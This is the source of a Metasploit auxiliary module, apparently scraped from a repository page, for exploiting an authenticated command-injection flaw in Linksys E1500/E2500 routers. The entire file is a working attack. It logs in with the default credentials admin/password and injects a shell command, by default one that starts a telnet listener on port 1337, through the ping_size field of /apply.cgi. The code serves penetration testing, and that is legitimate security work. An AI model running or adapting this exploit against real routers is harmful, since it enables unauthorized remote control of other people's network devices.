Path: blob/master/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Linksys E1500/E2500 Remote Command Execution',13'Description' => %q{14Some Linksys Routers are vulnerable to an authenticated OS command injection.15Default credentials for the web interface are admin/admin or admin/password. Since16it is a blind os command injection vulnerability, there is no output for the17executed command. A ping command against a controlled system for can be used for18testing purposes.19},20'Author' => [ 'Michael Messner <devnull[at]s3cur1ty.de>' ],21'License' => MSF_LICENSE,22'References' => [23[ 'OSVDB', '89912' ],24[ 'BID', '57760' ],25[ 'EDB', '24475' ],26[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]27],28'DisclosureDate' => '2013-02-05',29'Notes' => {30'Stability' => [CRASH_SAFE],31'SideEffects' => [IOC_IN_LOGS],32'Reliability' => []33}34)35)3637register_options(38[39OptString.new('HttpUsername', [ true, 'User to login with', 'admin']),40OptString.new('HttpPassword', [ true, 'Password to login with', 'password']),41OptString.new('CMD', [ true, 'The command to execute', 'telnetd -p 1337'])42]43)44end4546def run47uri = '/apply.cgi'48user = datastore['HttpUsername']49pass = datastore['HttpPassword']5051print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")5253begin54res = send_request_cgi({55'uri' => uri,56'method' => 'GET',57'authorization' => basic_auth(user, pass)58})5960return if res.nil?61return if (res.code == 404)6263if [200, 301, 302].include?(res.code)64print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")65else66print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")67return68end69rescue ::Rex::ConnectionError70vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")71return72end7374print_status("#{rhost}:#{rport} - Sending remote command: " + datastore['CMD'])7576cmd = datastore['CMD']77# original post request:78# data_cmd = "submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&79# action=&commit=0&ping_ip=1.1.1.1&ping_size=%26#{cmd}%26&ping_times=5&traceroute_ip="8081vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")82begin83send_request_cgi({84'uri' => uri,85'method' => 'POST',86'authorization' => basic_auth(user, pass),87'vars_post' => {88'submit_button' => 'Diagnostics',89'change_action' => 'gozila_cgi',90'submit_type' => 'start_ping',91'action' => '',92'commit' => '0',93'ping_ip' => '1.1.1.1',94'ping_size' => "&#{cmd}&",95'ping_times' => '5',96'traceroute_ip' => ''97}98})99rescue ::Rex::ConnectionError100vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")101return102end103print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")104print_status("#{rhost}:#{rport} - Blind Exploitation - wait around 10 seconds till the command gets executed")105end106end107108109